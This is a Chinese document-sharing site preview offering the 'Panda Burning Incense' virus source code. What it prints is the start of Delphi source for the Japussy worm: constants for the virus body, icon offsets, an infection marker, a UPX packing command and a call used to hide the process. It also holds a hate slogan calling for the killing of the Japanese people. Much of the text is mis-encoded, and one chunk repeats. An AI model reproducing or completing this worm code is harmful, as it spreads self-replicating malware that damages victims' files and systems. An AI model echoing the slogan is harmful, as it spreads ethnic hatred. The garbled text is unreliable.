熊貓燒香病毒源代碼

ID:46461126

大?。?1.00 KB

頁(yè)數(shù):7頁(yè)

時(shí)間:2019-11-24

熊貓燒香病毒源代碼_第1頁(yè)
熊貓燒香病毒源代碼_第2頁(yè)
熊貓燒香病毒源代碼_第3頁(yè)
熊貓燒香病毒源代碼_第4頁(yè)
熊貓燒香病毒源代碼_第5頁(yè)
資源描述:

《熊貓燒香病毒源代碼》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫(kù)。

1、“熊貓燒香”簡(jiǎn)介:“熊貓燒香”病毒是一個(gè)能在電腦操作系統(tǒng)上運(yùn)行的蠕蟲(chóng)病毒。采用“熊貓燒香”頭像作為圖標(biāo)。它的變種會(huì)感染EXE可執(zhí)行文件,被病毒感染的文件圖標(biāo)均變?yōu)椤靶茇垷恪薄M瑫r(shí),受感染的計(jì)算機(jī)還會(huì)出現(xiàn)藍(lán)屏、頻繁重啟以及文件被破壞等現(xiàn)象。該病毒會(huì)在中毒電腦中所有的網(wǎng)頁(yè)文件尾部添加病毒代碼。目前已有百萬(wàn)臺(tái)電腦受害。program?Japussy;usesWindows,?SysUtils,?Classes,?Graphics,?ShellAPI{,?Registry};constHeaderSize?=?82432;?????????????//病毒體的大小IconOff

2、set?=?$12EB8;???????????//PE文件主圖標(biāo)的偏移量//在我的Delphi5?SP1上面編譯得到的大小,其它版本的Delphi可能不同//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量??{HeaderSize?=?38912;?????????????//Upx壓縮過(guò)病毒體的大小IconOffset?=?$92BC;?????????????//Upx壓縮過(guò)PE文件主圖標(biāo)的偏移量//Upx?1.24W?用法:?upx?-9?--8086?Japussy.exe}IconSize???=?$2E8;?????????????//PE文

3、件主圖標(biāo)的大小--744字節(jié)IconTail???=?IconOffset?+?IconSize;?//PE文件主圖標(biāo)的尾部ID???????=?$44444444;?????????//感染標(biāo)記//垃圾碼,以備寫(xiě)入Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+????????'If?a?country?need?to?be?destroyed,?it?must?be?Japan!?'?+????????'***?W32.Japussy.Worm.A?***';{$R?*.RES}f

4、unction?RegisterServiceProcess(dwProcessID,?dwType:?Integer):?Integer;?stdcall;?external?'Kernel32.dll';?//函數(shù)聲明varTmpFile:?string;Si:?????STARTUPINFO;Pi:?????PROCESS_INFORMATION;IsJap:???Boolean?=?False;?//日文操作系統(tǒng)標(biāo)記{?判斷是否為Win9x?}function?IsWin9x:?Boolean;varVer:?TOSVersionInfo;beginResult?

5、:=?False;Ver.dwOSVersionInfoSize?:=?SizeOf(TOSVersionInfo);if?not?GetVersionEx(Ver)?“熊貓燒香”簡(jiǎn)介:“熊貓燒香”病毒是一個(gè)能在電腦操作系統(tǒng)上運(yùn)行的蠕蟲(chóng)病毒。采用“熊貓燒香”頭像作為圖標(biāo)。它的變種會(huì)感染EXE可執(zhí)行文件,被病毒感染的文件圖標(biāo)均變?yōu)椤靶茇垷恪?。同時(shí),受感染的計(jì)算機(jī)還會(huì)出現(xiàn)藍(lán)屏、頻繁重啟以及文件被破壞等現(xiàn)象。該病毒會(huì)在中毒電腦中所有的網(wǎng)頁(yè)文件尾部添加病毒代碼。目前已有百萬(wàn)臺(tái)電腦受害。program?Japussy;usesWindows,?SysUtils,?Classes,

6、?Graphics,?ShellAPI{,?Registry};constHeaderSize?=?82432;?????????????//病毒體的大小IconOffset?=?$12EB8;???????????//PE文件主圖標(biāo)的偏移量//在我的Delphi5?SP1上面編譯得到的大小,其它版本的Delphi可能不同//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量??{HeaderSize?=?38912;?????????????//Upx壓縮過(guò)病毒體的大小IconOffset?=?$92BC;?????????????//Upx壓縮過(guò)PE文件主

7、圖標(biāo)的偏移量//Upx?1.24W?用法:?upx?-9?--8086?Japussy.exe}IconSize???=?$2E8;?????????????//PE文件主圖標(biāo)的大小--744字節(jié)IconTail???=?IconOffset?+?IconSize;?//PE文件主圖標(biāo)的尾部ID???????=?$44444444;?????????//感染標(biāo)記//垃圾碼,以備寫(xiě)入Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+??????

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文

此文檔下載收益歸作者所有

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學(xué)公式或PPT動(dòng)畫(huà)的文件,查看預(yù)覽時(shí)可能會(huì)顯示錯(cuò)亂或異常,文件下載后無(wú)此問(wèn)題,請(qǐng)放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫(kù)負(fù)責(zé)整理代發(fā)布。如果您對(duì)本文檔版權(quán)有爭(zhēng)議請(qǐng)及時(shí)聯(lián)系客服。
3. 下載前請(qǐng)仔細(xì)閱讀文檔內(nèi)容,確認(rèn)文檔內(nèi)容符合您的需求后進(jìn)行下載,若出現(xiàn)內(nèi)容與標(biāo)題不符可向本站投訴處理。
4. 下載文檔時(shí)可能由于網(wǎng)絡(luò)波動(dòng)等原因無(wú)法下載或下載錯(cuò)誤,付費(fèi)完成后未能成功下載的用戶請(qǐng)聯(lián)系客服處理。
关闭